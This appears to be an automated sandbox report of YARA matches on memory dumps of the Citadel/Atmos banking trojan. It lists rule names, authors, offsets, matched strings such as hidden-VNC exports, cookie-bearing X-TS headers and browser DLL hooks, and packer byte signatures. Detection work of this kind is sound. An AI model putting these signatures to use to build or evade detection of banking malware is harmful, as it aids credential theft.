00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 91 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 91 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 91 00
00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 D4 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 D4 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 D4 00
00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 90 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 90 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 90 00
00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A1 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A1 00
00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 18 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 18 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 18 00
00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x120df:$MZ: 4D 5A 0x12227:$MZ: 4D 5A 0x1521d:$MZ: 4D 5A 0x1f494:$MZ: 4D 5A 0x1f4d4:$MZ: 4D 5A 0x3fa68:$MZ: 4D 5A 0x3e734:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 37 00 57 33 DB BF 00 28 00 00 0x3e7d8:$b: 68 C8 00 00 00 FF 15 4C 12 37 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f680:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f6a0:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e587:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 37 00
00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x8fa8:$c: %BOTID% 0x8fb0:$d: %BOTNET% 0x90c4:$f: bc_remove 0x90d0:$g: bc_add 0x7dc8:$ggurl: http://www.google.com/webhp
00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x120df:$MZ: 4D 5A 0x12227:$MZ: 4D 5A 0x1521d:$MZ: 4D 5A 0x1f494:$MZ: 4D 5A 0x1f4d4:$MZ: 4D 5A 0x3fa68:$MZ: 4D 5A 0x3e734:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 74 00 57 33 DB BF 00 28 00 00 0x3e7d8:$b: 68 C8 00 00 00 FF 15 4C 12 74 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f680:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f6a0:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e587:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 74 00
00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x8fa8:$c: %BOTID% 0x8fb0:$d: %BOTNET% 0x90c4:$f: bc_remove 0x90d0:$g: bc_add 0x7dc8:$ggurl: http://www.google.com/webhp
00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 F1 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 F1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 F1 00
00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x11e7f:$MZ: 4D 5A 0x11fc7:$MZ: 4D 5A 0x14fbd:$MZ: 4D 5A 0x1f234:$MZ: 4D 5A 0x1f274:$MZ: 4D 5A 0x3e4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e578:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x8d48:$c: %BOTID% 0x8d50:$d: %BOTNET% 0x8e64:$f: bc_remove 0x8e70:$g: bc_add 0x7b68:$ggurl: http://www.google.com/webhp
00000000.00000003.1693418014.0000000002590000.00000004.00001000.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
